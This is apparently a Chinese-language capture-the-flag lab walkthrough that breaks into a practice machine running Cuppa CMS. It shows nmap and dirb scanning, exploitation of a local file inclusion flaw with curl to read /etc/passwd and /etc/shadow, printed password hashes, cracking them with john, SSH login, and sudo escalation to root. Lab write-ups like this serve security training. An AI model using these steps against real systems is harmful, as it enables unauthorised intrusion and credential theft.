靶场下载地址:
1. 主机发现+端口扫描+目录扫描+信息收集
1.1. 主机发现
nmap -sn 192.168.7.0/24|grep -B 2 '00:0C:29:B4:57:C0'
1.2. 端口扫描
nmap -p- 192.168.7.94
1.3. 目录扫描
dirb http://192.168.7.94
1.4. 信息收集
whatweb 192.168.7.94
2. WEB打点寻找漏洞点+GetShell
2.1. 访问80端口页面
2.2. 逐个拼接目录
1.拼接/administrator
2.这是数据库的一个创建流程,页面title显示的是Cuppa CMS
,可以通过cms来寻找Nday,使用kali的searchsploit
工具来搜索Cuppa CMS
所存在的历史漏洞
searchsploit cuppa
3.存在一个漏洞 -> 将25971.txt文件导出到桌面
searchsploit -m php/webapps/25971.txt
查看文件 -> 此漏洞主要是利用/alerts/alertConfigField.php文件urlConfig参数存在 LFI 漏洞,可以利用特殊的 url ,查看本地文件
cat 25971.txt
4.稍加改变,尝试拼接下面这些路径 -> 无信息
http://192.168.7.94/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
源代码也无可用信息
5.综合利用文件包含漏洞中无回显的利用方式,尝试用curl下载信息 -> 成功,并且有个用户可能存在SUDO提权
curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.7.94/administrator/alerts/alertConfigField.php
6.既然可以正常下载,争取获得更多有用的信息
# 获得存储密码的shadow文件
curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.7.94/administrator/alerts/alertConfigField.php
7.shadow文件中有着root、www-data、w1r3s 三个用户的密码 -> 将其存储在password.txt文件中,尝试用 john 破解
root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.
利用john破解
john pas.txt
>>>
# www-data:www-data
# w1r3s:computer
2.3. GetShell
1.尝试用破解到的用户进行ssh连接【w1r3s:computer】
ssh w1r3s@192.168.7.94
3. 权限提升
老规矩,查看用户权限 -> 👏 舒服了,权限是all,直接提权! ->成功!
suod -l
sudo su